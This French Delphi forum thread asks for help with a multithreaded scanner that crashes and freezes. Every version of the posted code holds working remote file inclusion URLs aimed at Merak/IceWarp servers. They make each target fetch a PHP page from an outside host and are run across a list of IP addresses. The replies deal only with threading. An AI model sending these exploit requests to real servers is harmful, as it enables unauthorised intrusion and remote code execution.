IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Delphi Discussion :

Attendre la fin d'un thread: Access violation


Sujet :

Delphi

  1. #1
    Membre régulier
    Profil pro
    Directeur
    Inscrit en
    Juin 2005
    Messages
    113
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Directeur

    Informations forums :
    Inscription : Juin 2005
    Messages : 113
    Points : 87
    Points
    87
    Par défaut Attendre la fin d'un thread: Access violation
    Voila, je code un petit testeur de vulnerabilité pour me mettre au threads (et oui, c'est mes premiers pas ) mais j'ai un petit prob au niveau de mon multithread. J'ai deux for imbriqués, et j'aimerais que le plus "haut" attente la fin du dernier thread du plus "petit" pour repartir mais j'ai droit a cette jolie erreur:



    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    unit Unit1;
     
    interface
     
    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, StdCtrls, XPMan, Erazerz, IdBaseComponent, IdComponent,
      IdTCPConnection, IdTCPClient, IdHTTP;
     
    type
      TForm1 = class(TForm)
        IdHTTP1: TIdHTTP;
        Edit1: TEdit;
        Check: TButton;
        Label1: TLabel;
        XPManifest1: TXPManifest;
        OD: TOpenDialog;
        Browse: TButton;
        Memo1: TMemo;
        Label2: TLabel;
        Label3: TLabel;
        ListBox1: TListBox;
        Label4: TLabel;
        procedure CheckClick(Sender: TObject);
        procedure BrowseClick(Sender: TObject);
      private
        { Private declarations }
      public
        { Public declarations }
      end;
    Const NbThreads = 50;
     
    var
      Form1: TForm1;
      Vuln: Bool;
      Xploit, IP: String;
     
    implementation
     
    Uses Unit2;
    {$R *.dfm}
     
    procedure TForm1.CheckClick(Sender: TObject);
    var i, j, k: integer;
         ScanArrayThread: Array[1..NbThreads] of TScan;
    begin
      vuln := false;
      xploit := '';
      Label4.Caption := 'Checking...' ;
     
      k := 0;
      for i := 0 to (ListBox1.Items.Count - 1) div NbThreads do
      begin
        for j := 1 to NbThreads do
        begin
          if k <> ListBox1.Items.Count then
          begin
            IP := Listbox1.Items[k];
            ScanArrayThread[j] := TScan.Create(false);
            inc(k);
          end;
        end;
      Repeat Application.ProcessMessages;
      until ScanArrayThread[NbThreads].ThreadTerminated;
      end;
     
      for i := 0 to (ListBox1.Items.Count - 1) mod NbThreads do
      begin
        for j := 1 to (ListBox1.Items.Count - 1) mod NbThreads do
        begin
          if k <> ListBox1.Items.Count then
          begin
            IP := Listbox1.Items[k];
            ScanArrayThread[j] := TScan.Create(false);
            inc(k);
          end;
        end;
      Repeat Application.ProcessMessages;
      until ScanArrayThread[NbThreads].ThreadTerminated;
      end;
     
      Label4.Caption := 'Done' ;
    end;
     
    procedure TForm1.BrowseClick(Sender: TObject);
    var InputName, SInput: string;
        input, bytes: dword;
        i: integer;
    begin
      if OD.Execute then begin
        edit1.Text := OD.FileName;
        InputName := Edit1.Text;
        Input := CreateFile(pchar(InputName), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
        i := GetFileSize(InputName);
        SetLength(SInput, i);
        ReadFile(input, SInput[1], i, bytes, nil);
        while pos(chr(13), SInput) <> 0 do
        begin
          ListBox1.Items.Add(Trim(copy(SInput, 1, pos(chr(13), SInput))));
          Delete(SInput, 1, pos(chr(13), SInput));
        end;
      end;
    end;
     
    end.
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    unit Unit2;
     
    interface
     
    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdTCPConnection,
      IdTCPClient, IdHTTP;
     
    type
      TScan = class(TThread)
      private
        { Private declarations }
        procedure OnTerminateProcedure(Sender : TObject);
      protected
        procedure Execute; override;
      public
        ThreadTerminated: Bool;
        constructor Create(Suspended : Boolean);
      end;
     
    implementation
     
    Uses Unit1;
    { Important: Methods and properties of objects in visual components can only be
      used in a method called using Synchronize, for example,
     
          Synchronize(UpdateCaption);
     
      and UpdateCaption could look like,
     
        procedure TScan.UpdateCaption;
        begin
          Form1.Caption := 'Updated in a thread';
        end; }
     
    { TScan }
     
    constructor TScan.Create(Suspended : Boolean);
    begin
      FreeOnTerminate := True;
      inherited create(Suspended);
      OnTerminate := OnTerminateProcedure;
      ThreadTerminated := False;
    end;
     
    procedure TScan.OnTerminateProcedure(Sender : TObject);
    begin
      ThreadTerminated := True
    end;
     
    procedure TScan.Execute;
    var HTTP: TIdHTTP;
        url, content: string;
    Begin
     
      HTTP := TIdHTTP.Create(nil);
      Try
        HTTP.Host := IP;
        HTTP.Port := 32000;
        HTTP.Connect(3000);
        if HTTP.Connected then
        begin
          vuln := false;
          url := 'http://' + IP + ':32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://182shaolin.free.fr/vulntest.php;';
          Content := '';
          Content := HTTP.Get(URL);
          If Content = 'VULNERABLE' then begin vuln := true; xploit := url; end;
          url := 'http://' + IP + ':32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://182shaolin.free.fr/vulntest.php';
          Content := '';
          Content := HTTP.Get(URL);
          If Content = 'VULNERABLE' then begin vuln := true; xploit := url; end;
          url := 'http://' + IP + ':32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://182shaolin.free.fr/vulntest.php';
          Content := '';
          Content := HTTP.Get(URL);
          If Content = 'VULNERABLE' then begin vuln := true; xploit := url; end;
          if vuln = true then Form1.memo1.lines.Add(xploit);
        end;
      finally
        HTTP.Free;
      end;
    end;
     
    end.
    Si qq1 avait une idee d'ou ca peut venir, ca m'arragerait ...

  2. #2
    Membre actif
    Profil pro
    Inscrit en
    Juillet 2003
    Messages
    190
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Juillet 2003
    Messages : 190
    Points : 218
    Points
    218
    Par défaut
    bonjour

    met la propriété freeonterminated de tes threads a false

    freeonterminated:=false;

    et libère manuellement les threads apres le traitement

    thread.terminate;
    thread.waitfor;
    thread.free;

  3. #3
    Membre régulier
    Profil pro
    Directeur
    Inscrit en
    Juin 2005
    Messages
    113
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Directeur

    Informations forums :
    Inscription : Juin 2005
    Messages : 113
    Points : 87
    Points
    87
    Par défaut
    J'ai modif ca comme ca:
    Unit1:
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
      k := 0;
      for i := 0 to (ListBox1.Items.Count - 1) div NbThreads do
      begin
        for j := 1 to NbThreads do
        begin
          if k <> ListBox1.Items.Count then
          begin
            IP := Listbox1.Items[k];
            try
              ScanArrayThread[j] := TScan.Create(false);
              ScanArrayThread[j].Terminate;
              ScanArrayThread[j].WaitFor;
            finally
              ScanArrayThread[j].Free;
            end;
            inc(k);
          end;
        end;
      Repeat Application.ProcessMessages;
      until ScanArrayThread[NbThreads].ThreadTerminated;
      end;

    Ca me m'affiche plus l'erreure, mais ca a pas l'air de fonctionné ... (et le prog freeze, or, il me semble que le but des threads, c que ca freeze pas, non?)

  4. #4
    Membre éclairé Avatar de Kaféine
    Homme Profil pro
    Inscrit en
    Avril 2007
    Messages
    569
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations forums :
    Inscription : Avril 2007
    Messages : 569
    Points : 736
    Points
    736
    Par défaut
    Salut,
    j'ai pas trés bein compris ton code....

    tu as un tableau de TScan? cette objet lance des urls sur internet et recupere les infos. ensuite il regarde sil trouve la chaine 'Vulnerable'....

    en voyant ce bout de code

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
     
     if vuln = true then Form1.memo1.lines.Add(xploit);
    dans le execute de ton thread je me rend compte que ta pas compris ce commentaire

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
     
    { Important: Methods and properties of objects in visual components can only be
      used in a method called using Synchronize, for example,
     
          Synchronize(UpdateCaption);
     
      and UpdateCaption could look like,
     
        procedure TScan.UpdateCaption;
        begin
          Form1.Caption := 'Updated in a thread';
        end; }
    peux tu m'expliquer la finalité de ton programme?

  5. #5
    Membre régulier
    Profil pro
    Directeur
    Inscrit en
    Juin 2005
    Messages
    113
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Directeur

    Informations forums :
    Inscription : Juin 2005
    Messages : 113
    Points : 87
    Points
    87
    Par défaut
    Dans Unit2.pass
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    implementation
     
    Uses Unit1;
    J'avais testé avec 1seul thread, ca fonctionnait, il mettait bien le texte dans le memo.

    C'est un scanner de vulnerabilité pour une faille de type RFI affectant merak/icewrap. Ca permet donc de voir les serveurs vulnerables a patcher. La, ca injecte une page php qui a simplement le texte "VULNERABLE" dedans, si ca l'est, ca met l'ip dans le memo. La vuln est vielle et le prog sera sans doute inutile mais je me suis dit que l'idee pourais etre bien pour me mettre aux threads et au multithreading.

    Edit: Mince, j'ai de nouvueau l'access violation :/ rahalala, chui mauvais ^^

  6. #6
    Membre régulier
    Profil pro
    Directeur
    Inscrit en
    Juin 2005
    Messages
    113
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations professionnelles :
    Activité : Directeur

    Informations forums :
    Inscription : Juin 2005
    Messages : 113
    Points : 87
    Points
    87
    Par défaut
    code actuel
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    unit Unit1;
     
    interface
     
    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, StdCtrls, XPMan, Erazerz, IdBaseComponent, IdComponent,
      IdTCPConnection, IdTCPClient, IdHTTP;
     
    type
      TForm1 = class(TForm)
        IdHTTP1: TIdHTTP;
        Edit1: TEdit;
        Check: TButton;
        Label1: TLabel;
        XPManifest1: TXPManifest;
        OD: TOpenDialog;
        Browse: TButton;
        Memo1: TMemo;
        Label2: TLabel;
        Label3: TLabel;
        ListBox1: TListBox;
        Label4: TLabel;
        Label5: TLabel;
        Memo2: TMemo;
        procedure CheckClick(Sender: TObject);
        procedure BrowseClick(Sender: TObject);
      private
        { Private declarations }
        //procedure GetPage(IP: string; var vuln: bool; var xploit: string);
      public
        { Public declarations }
      end;
    Const NbThreads = 50;
     
    var
      Form1: TForm1;
      Vuln: Array[1..NbThreads] of Bool;
      Xploit, IP: Array[1..NbThreads] of String;
      i, j, k: integer;
     
    implementation
     
    Uses Unit2;
    {$R *.dfm}
     
    procedure TForm1.CheckClick(Sender: TObject);
    var  //ScanThread: TScan;
         ScanArrayThread: Array[1..NbThreads] of TScan;
    begin
      For i := 1 to NbThreads do vuln[i] := false;
      For i := 1 to NbThreads do xploit[i] := '';
      Label4.Caption := 'Checking...' ;
      { for i := 0 to Listbox1.Items.Count - 1 do
      begin
        //GetPage(Listbox1.Items[i], vuln, xploit);
     
          IP := Listbox1.Items[i];
          ScanThread := TScan.Create(false);
          //if vuln = true then memo1.lines.Add(xploit);
     
      end;
      }
     
      k := 0;
      if ListBox1.Items.Count >= NbThreads then
      begin
        for i := 0 to (ListBox1.Items.Count - 1) div NbThreads do
        begin
          for j := 1 to NbThreads do
          begin
            if k <> ListBox1.Items.Count then
            begin
              IP[j] := Listbox1.Items[k];
              //try
                ScanArrayThread[j] := TScan.Create(false);
                //ScanArrayThread[j].Terminate;
                //ScanArrayThread[j].WaitFor;
              //finally
                //ScanArrayThread[j].Free;
              //end;
              inc(k);
            end;
          end;
     
          for j := 1 to NbThreads do
          begin
            ScanArrayThread[j].Terminate;
            ScanArrayThread[j].WaitFor;
            ScanArrayThread[j].Free;
          end;
        //Repeat Application.ProcessMessages;
        //until ScanArrayThread[NbThreads].ThreadTerminated;
        end;
      end;
     
      for i := 0 to (ListBox1.Items.Count mod NbThreads) - 1 do
      begin
        for j := 1 to ListBox1.Items.Count mod NbThreads do
        begin
          if k <> ListBox1.Items.Count then
          begin
            IP[j] := Listbox1.Items[k];
            //try
              ScanArrayThread[j] := TScan.Create(false);
              //ScanArrayThread[j].Terminate;
              //ScanArrayThread[j].WaitFor;
            //finally
              //ScanArrayThread[j].Free;
            //end;
            inc(k);
          end;
        end;
     
        for j := 1 to (ListBox1.Items.Count - 1) mod NbThreads do
        begin
          ScanArrayThread[j].Terminate;
          ScanArrayThread[j].WaitFor;
          ScanArrayThread[j].Free;
        end;
      //Repeat Application.ProcessMessages;
      //until ScanArrayThread[NbThreads].ThreadTerminated;
      end;
     
      Label4.Caption := 'Done' ;
    end;
     
    {procedure TForm1.GetPage(IP: string; var vuln: bool; var xploit: string);
    var HTTP: TIdHTTP;
        url, content: string;
    Begin
      HTTP := TIdHTTP.Create(nil);
      Try
        vuln := false;
        url := 'http://' + IP + ':32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://182shaolin.free.fr/vulntest.php;';
        Content := '';
        Content := HTTP.Get(URL);
        If Content = 'VULNERABLE' then begin vuln := true; xploit := url; end;
        url := 'http://' + IP + ':32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://182shaolin.free.fr/vulntest.php';
        Content := '';
        Content := HTTP.Get(URL);
        If Content = 'VULNERABLE' then begin vuln := true; xploit := url; end;
        url := 'http://' + IP + ':32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://182shaolin.free.fr/vulntest.php';
        Content := '';
        Content := HTTP.Get(URL);
        If Content = 'VULNERABLE' then begin vuln := true; xploit := url; end;
      finally
        HTTP.Free;
      end;
    end; }
     
     
    procedure TForm1.BrowseClick(Sender: TObject);
    var InputName, SInput: string;
        input, bytes: dword;
        i: integer;
    begin
      if OD.Execute then begin
        edit1.Text := OD.FileName;
        InputName := Edit1.Text;
        Input := CreateFile(pchar(InputName), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
        i := GetFileSize(InputName);
        SetLength(SInput, i);
        ReadFile(input, SInput[1], i, bytes, nil);
        while pos(chr(13), SInput) <> 0 do
        begin
          ListBox1.Items.Add(Trim(copy(SInput, 1, pos(chr(13), SInput))));
          Delete(SInput, 1, pos(chr(13), SInput));
        end;
      end;
    end;
     
    end.
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    unit Unit2;
     
    interface
     
    uses
      Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
      Dialogs, StdCtrls, IdBaseComponent, IdComponent, IdTCPConnection,
      IdTCPClient, IdHTTP;
     
    type
      TScan = class(TThread)
      private
        { Private declarations }
        procedure OnTerminateProcedure(Sender : TObject);
      protected
        procedure Execute; override;
      public
        ThreadTerminated: Bool;
        constructor Create(Suspended : Boolean);
      end;
     
    implementation
     
    Uses Unit1;
    { Important: Methods and properties of objects in visual components can only be
      used in a method called using Synchronize, for example,
     
          Synchronize(UpdateCaption);
     
      and UpdateCaption could look like,
     
        procedure TScan.UpdateCaption;
        begin
          Form1.Caption := 'Updated in a thread';
        end; }
     
    { TScan }
     
    constructor TScan.Create(Suspended : Boolean);
    begin
      FreeOnTerminate := False;
      inherited create(Suspended);
      OnTerminate := OnTerminateProcedure;
      ThreadTerminated := False;
    end;
     
    procedure TScan.OnTerminateProcedure(Sender : TObject);
    begin
      ThreadTerminated := True
    end;
     
    procedure TScan.Execute;
    var HTTP: TIdHTTP;
        url, content: string;
    Begin
      vuln[j] := false;
      HTTP := TIdHTTP.Create(nil);
      Try
        HTTP.Host := IP;
        HTTP.Port := 32000;
        HTTP.Connect(3000);
        if HTTP.Connected then
        begin
          url := 'http://' + IP[j] + ':32000/mail/index.html?id=[current_id]&lang_settings[TEST]=test;http://182shaolin.free.fr/vulntest.php;';
          Content := '';
          Content := HTTP.Get(URL);
          If Content = 'VULNERABLE' then begin vuln[j] := true; xploit[j] := url; end;
          url := 'http://' + IP[j] + ':32000/admin/inc/include.php?language=0&lang_settings[0][1]=http://182shaolin.free.fr/vulntest.php';
          Content := '';
          Content := HTTP.Get(URL);
          If Content = 'VULNERABLE' then begin vuln[j] := true; xploit[j] := url; end;
          url := 'http://' + IP[j] + ':32000/accounts/inc/include.php?language=0&lang_settings[0][1]=http://182shaolin.free.fr/vulntest.php';
          Content := '';
          Content := HTTP.Get(URL);
          If Content = 'VULNERABLE' then begin vuln[j] := true; xploit[j] := url; end;
        end;
      finally
        HTTP.Free;
      end;
      if vuln[j] = true then Form1.memo1.lines.Add(xploit[j]) else Form1.memo2.lines.Add(IP[j]);
    end;
     
    end.
    J'ai plus l'access violation vu que j'ai commenté le repeat...until mais, ca freeze et ca a pas l'air de fonctionner :/

Discussions similaires

  1. [Executor] Attendre la fin d'un thread
    Par onlytoine dans le forum Collection et Stream
    Réponses: 3
    Dernier message: 24/05/2012, 10h30
  2. attendre la fin d'un thread
    Par gastoncs dans le forum VB.NET
    Réponses: 1
    Dernier message: 02/03/2012, 18h02
  3. Attendre la fin d'un thread
    Par apmic dans le forum EDT/SwingWorker
    Réponses: 8
    Dernier message: 23/08/2007, 10h04
  4. [thread]attendre la fin d'un thread?....
    Par babarpapa dans le forum Concurrence et multi-thread
    Réponses: 9
    Dernier message: 29/03/2006, 14h31
  5. [Thread] comment attendre la fin d'un thread?
    Par billynirvana dans le forum Concurrence et multi-thread
    Réponses: 11
    Dernier message: 24/08/2005, 10h43

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo